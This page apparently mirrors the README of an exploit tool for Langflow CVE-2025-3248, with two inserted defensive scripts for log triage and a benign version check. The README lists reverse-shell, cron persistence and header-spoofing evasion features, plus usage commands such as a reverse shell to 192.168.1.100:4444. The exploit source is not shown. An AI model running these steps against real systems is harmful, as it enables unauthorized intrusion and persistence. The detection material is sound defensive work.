
CVE-2025-3248 PoC: Langflow Security Vulnerability

Source
Associated Vulnerability
Title: Langflow Security Vulnerability (CVE-2025-3248)
Description: Langflow is an open-source visual framework from Langflow for building multi-agent and RAG applications. Langflow versions before 1.3.0 contain a security vulnerability: the /api/v1/validate/code endpoint is subject to code injection, which may allow a remote, unauthenticated attacker to execute arbitrary code.
Description
Remote Code Execution Exploit for Langflow (CVE-2025-3248) - [ By S4Tech ]
Readme
# Langflow RCE Exploit (CVE-2025-3248)

![Python Version](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-MIT-green)
![Platform](https://img.shields.io/badge/platform-Linux%20%7C%20Windows-lightgrey)

Remote Code Execution Exploit for Langflow (CVE-2025-3248)

## Features

- Automatic vulnerability detection
- Multiple exploitation modes:
  - Interactive shell
  - Single command execution
  - Reverse shell connection
- File upload capability
- Colorized user interface
- Multiple reverse shell methods
- Command history persistence


## 📌 Changelog (v2.0)

### ✨ New Features:
- **Advanced payload system** with 5 execution methods  
- **File upload/download** with Base64 encoding  
- **Persistence** via cron jobs (`persist` command)  
- **Interactive shell upgrades**:  
  - `upload local_path remote_path`  
  - `download remote_path local_path`  
  - `clear` command for terminal  

### 🛡️ Evasion Enhancements:
- **Automatic payload obfuscation** (Base64 + random variants)  
- **Header rotation** per request:  
  - Random `User-Agent`  
  - Spoofed `X-Forwarded-For` IPs  
- **Self-signed certificate support** (TLS certificate verification is disabled)  
- **No redirects** to avoid detection  
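
Because the tool rotates both the `User-Agent` and the `X-Forwarded-For` value on every request, detection on the server side should key on the request path and the TCP peer address, not on either header. The following is an added example for this page, not code from the exploit repository: it parses constructed access-log lines (an assumed nginx "combined" format with a trailing quoted `X-Forwarded-For` field), groups POSTs to `/api/v1/validate/code` by peer, and flags peers whose headers vary from one request to the next.

```python
"""Access-log triage for CVE-2025-3248 probing.

Added example for this page, not code from the exploit repository. It scans
web-server access lines for POST /api/v1/validate/code and groups them by
the TCP peer address rather than by X-Forwarded-For, because the tool
described above rotates both User-Agent and X-Forwarded-For per request.

Assumed, constructed log format: nginx "combined" plus a trailing quoted
X-Forwarded-For field. The sample lines below are made up for the example.
"""
import re
from collections import defaultdict

TARGET_PATH = "/api/v1/validate/code"

LOG_RE = re.compile(
    r'^(?P<remote>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)

# Constructed sample: one peer hammering the endpoint with rotating headers,
# one benign version lookup, one POST rejected by a patched instance.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2025:10:01:02 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0" "198.51.100.23"
203.0.113.7 - - [10/Apr/2025:10:01:03 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 61 "-" "curl/8.4.0" "192.0.2.88"
203.0.113.7 - - [10/Apr/2025:10:01:05 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 61 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/124.0" "172.16.9.4"
198.51.100.5 - - [10/Apr/2025:10:02:00 +0000] "GET /api/v1/version HTTP/1.1" 200 54 "-" "python-requests/2.31.0" "-"
10.0.0.12 - - [10/Apr/2025:10:03:10 +0000] "POST /api/v1/validate/code HTTP/1.1" 401 32 "-" "Mozilla/5.0 (Macintosh) Safari/17.3" "-"
"""


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def validate_code_hits(log_text):
    """Group POSTs to the validate endpoint by peer address."""
    hits = defaultdict(lambda: {"requests": 0, "successes": 0,
                                "user_agents": set(), "xff": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != TARGET_PATH:
            continue
        h = hits[rec["remote"]]
        h["requests"] += 1
        if rec["status"] == "200":       # the validator accepted and processed the body
            h["successes"] += 1
        h["user_agents"].add(rec["ua"])
        h["xff"].add(rec["xff"])
    return dict(hits)


def alerts(log_text):
    """One alert per peer; severity is high when any POST got a 200."""
    out = []
    for remote, h in sorted(validate_code_hits(log_text).items()):
        out.append({
            "peer": remote,
            "requests": h["requests"],
            "severity": "high" if h["successes"] else "low",
            # Several UAs or several XFF values from one peer in a short
            # window is the header-rotation pattern from the changelog.
            "rotating_headers": len(h["user_agents"]) > 1 or len(h["xff"]) > 1,
        })
    return out


if __name__ == "__main__":
    for a in alerts(SAMPLE_LOG):
        print(a)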

### ⚡ Technical Improvements:
- **Multi-stage vulnerability verification**  
- **Enhanced error handling** for unstable connections  
- **Full session logging** to `exploit_log.txt`  
- **Command history** persistence (`.langflow_shell_history`)  

### 📊 Version Comparison:

| Feature                | v1.0         | v2.0         |
|------------------------|--------------|--------------|
| Payload Methods        | 1            | 5            |
| File Transfer          | ❌ Not supported | ✅ Supported |
| Persistence           | ❌            | ✅           |
| Stealth Level         | Basic        | Advanced     |
| Session Logging       | ❌            | ✅           |

### 🐛 Bug Fixes:
- Fixed HTTPS connection issues  
- Improved handling of special characters in commands  
- Stabilized reverse shell reliability  



## Requirements

- Python 3.6 or newer
- Required libraries:
  - `requests`
  - `colorama`
  - `readline` (part of the Python standard library on Linux; not available on Windows, where a substitute such as `pyreadline3` is needed)

## Installation

```bash
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
```

## Usage

```bash
python exploit.py <URL> [options]
```

### Available Options:

| Option              | Description                                   |
|---------------------|-----------------------------------------------|
| `--shell`           | Start interactive shell                       |
| `--reverse IP PORT` | Launch reverse shell to specified IP:PORT     |
| `--command CMD`     | Execute single command                        |
| `--verbose`         | Enable verbose output                         |
| `--timeout SEC`     | Set request timeout (default: 10s)            |

### Examples:

1. Check vulnerability:
```bash
python exploit.py http://target.com
```

2. Start interactive shell:
```bash
python exploit.py http://target.com --shell
```

3. Execute single command:
```bash
python exploit.py http://target.com --command "whoami"
```

4. Launch reverse shell:
```bash
python exploit.py http://target.com --reverse 192.168.1.100 4444
```
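
The check mode above needs the tool and its dependencies. As an added example for this page (not code from the exploit repository), the script below does the same pre-check with only the standard library: it reads the advertised version, compares it against the 1.3.0 fix boundary given in the vulnerability description, and sends one harmless function definition to `/api/v1/validate/code` without credentials, classifying the response instead of executing anything on the target. Assumptions not stated on the page: `GET /api/v1/version` returns JSON with a `version` field, the validate endpoint takes a JSON body `{"code": ...}`, and a patched instance answers an anonymous POST with 401 or 403.

```python
"""Stand-alone pre-check for CVE-2025-3248 (Langflow < 1.3.0).

Added example for this page; it is not code from the exploit repository.
It reads the advertised version and then sends one harmless function
definition to /api/v1/validate/code without credentials, classifying the
response instead of running anything on the target.

Assumptions not stated on the page: GET /api/v1/version returns JSON with a
"version" field, POST /api/v1/validate/code takes a JSON body {"code": ...},
and a patched instance answers an anonymous POST with 401 or 403.
"""
import json
import re
import sys
import urllib.error
import urllib.request
from typing import Optional, Tuple

FIXED_IN = (1, 3, 0)                       # first release without the flaw (per the advisory)
VALIDATE_PATH = "/api/v1/validate/code"    # endpoint named in the advisory
VERSION_PATH = "/api/v1/version"           # assumed unauthenticated version endpoint
BENIGN_CODE = "def probe():\n    return 1\n"   # parses cleanly, calls nothing


def vulnerable_version(version: str) -> bool:
    """True when the numeric part of `version` is below 1.3.0.

    Pre-release suffixes ("1.3.0.dev3", "1.2.0rc1") are reduced to their
    first three numeric components, so treat dev builds with care.
    """
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    nums += [0] * (3 - len(nums))
    return tuple(nums) < FIXED_IN


def classify(status: int, body: str) -> str:
    """Turn an anonymous POST's status and body into a verdict string."""
    if status in (401, 403):
        return "auth-required"            # expected from 1.3.0 and later
    if status == 404:
        return "endpoint-missing"         # not Langflow, or a different mount path
    if status == 200:
        try:
            parsed = json.loads(body)
        except ValueError:
            return "unknown"
        # The validator answered an unauthenticated caller with JSON: the
        # endpoint is reachable without credentials, the CVE-2025-3248 condition.
        return "reachable-unauthenticated" if isinstance(parsed, dict) else "unknown"
    return "unknown"


def _request(url: str, data: Optional[bytes], timeout: float) -> Tuple[int, str]:
    """One HTTP exchange; HTTP error responses are returned, not raised."""
    req = urllib.request.Request(url, data=data,
                                 headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(base_url: str, timeout: float = 10.0) -> dict:
    """Version check plus one anonymous benign POST; returns both findings."""
    base = base_url.rstrip("/")
    result = {"version": None, "version_vulnerable": None, "endpoint": None}
    status, body = _request(base + VERSION_PATH, None, timeout)
    if status == 200:
        try:
            result["version"] = json.loads(body).get("version")
        except (ValueError, AttributeError):
            pass
    if result["version"]:
        result["version_vulnerable"] = vulnerable_version(result["version"])
    payload = json.dumps({"code": BENIGN_CODE}).encode()
    status, body = _request(base + VALIDATE_PATH, payload, timeout)
    result["endpoint"] = classify(status, body)
    return result


if __name__ == "__main__":
    print(json.dumps(probe(sys.argv[1]), indent=2))
```

A `reachable-unauthenticated` verdict together with a version below 1.3.0 is the condition described in the advisory; `auth-required` is what a patched instance returns. The probe only defines a function and never calls it, so nothing runs on the target beyond Langflow's own parsing of the submitted code.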

## Screenshots

![Image](https://raw.githubusercontent.com/0-d3y/langflow-rce-exploit/refs/heads/main/Langflow-Figure-1-updated%20(1).png)  


## Warning

⚠️ This tool is for **educational and authorized testing purposes only**.  
⚠️ Unauthorized use against systems you don't own or have permission to test is illegal.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Author

- **Mr.SaMi**  
  [![Twitter](https://img.shields.io/badge/Twitter-@Linux_ye-blue)](https://twitter.com/Linux_ye)  
  [![Instagram](https://img.shields.io/badge/Instagram-@s4tech.ye-purple)](https://instagram.com/s4tech.ye)

## Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
File Snapshot

    [4.0K] /data/pocs/16adf7c88402d2c37999b6b52826825af928c2ab
    ├── [9.5K] exploit.py
    ├── [100K] Langflow-Figure-1-updated (1).png
    ├── [   1] output.txt
    ├── [4.0K] README.md
    └── [  66] requirements.txt

    0 directories, 5 files